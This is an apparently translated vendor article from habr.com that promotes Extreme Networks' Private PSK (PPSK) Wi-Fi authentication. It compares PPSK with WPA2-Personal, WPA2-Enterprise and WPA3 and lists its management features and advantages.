WPA3 has already been adopted, and since July 2020 it is mandatory for devices that are certified by the WiFi-Alliance, WPA2 has not been canceled and is not going to. At the same time, both WPA2 and WPA3 provide for operation in PSK and Enterprise modes, but we propose to consider Private PSK technology in our article, as well as the benefits that can be achieved with its help.
WPA2-Personal problems have been known for a long time and, in general, have already been fixed (Priority Management Frames, fixes for the KRACK vulnerability, etc.). The main remaining disadvantage of WPA2 using PSK is that weak passwords are fairly easy to crack with a dictionary attack. In the event of a compromise and changing the password to a new one, it will be necessary to reconfigure all connected devices (and access points), which can be a very time consuming process (to solve the βweak passwordβ problem, WiFi-Alliance recommends using passwords of at least 20 characters).
Another issue that sometimes cannot be solved using WPA2-Personal is the assignment of different profiles (vlan, QoS, firewall ...) to groups of devices connected to the same SSID.
With the help of WPA2-Enterprise it is possible to solve all the problems described above, but the price for this will be:
- The need to have or deploy PKI (Public Key Infrastructure) and security certificates;
- Installation may be difficult;
- Troubleshooting may be difficult;
- Not the best solution for IoT devices or guest access.
A more radical solution to the problems of WPA2-Personal is the transition to WPA3, the main improvement of which is the use of SAE (Simultaneous Authentication of Equals) and static PSK. WPA3-Personal solves the "dictionary attack" problem, but does not provide unique identification during authentication and, accordingly, the ability to assign profiles (since it still uses a common static password).
It's also important to keep in mind that over 95% of existing clients currently do not support WPA3 and SAE, and WPA2 continues to work successfully on the billions of devices already released.
In order to get a solution to the existing, or potential problems described above, Extreme Networks developed Private Pre-Shared Key (PPSK) technology. PPSK is compatible with any Wi-Fi client that supports WPA2-PSK and allows you to achieve a level of security comparable to that achieved using WPA2-Enterprise, without the need to build an 802.1X/EAP infrastructure. Private PSK is essentially WPA2-PSK, but each user (or group of users) can have their own dynamically generated password. PPSK management is no different from PSK management as the whole process is automated. The key database can be stored locally on access points or in the cloud.
Passwords can be generated automatically, it is possible to flexibly set their length/strength, period or expiration date, delivery method to the user (by mail or SMS):
You can also configure the maximum number of clients that can connect using one PPSK, or even configure βMAC-bindingβ for connected devices. At the command of the network administrator, any key can be easily revoked, and access to the network will be denied without the need to reconfigure all other devices. If the client is connected when the key is revoked, the access point will automatically disconnect it from the network.
Of the main advantages of PPSK, we note:
- ease of use with a high level of security;
- repelling a dictionary attack is solved using long and strong passwords that ExtremeCloudIQ can automatically generate and distribute;
- the ability to assign different security profiles to different devices connected to the same SSID;
- great for secure guest access;
- great for secure access when devices don't support 802.1X/EAP (handheld scanners or IoT/VoWiFi devices);
- successfully used and improved for over 10 years.
If you have any questions or have any questions, you can always ask the staff of our office - .
Source: habr.com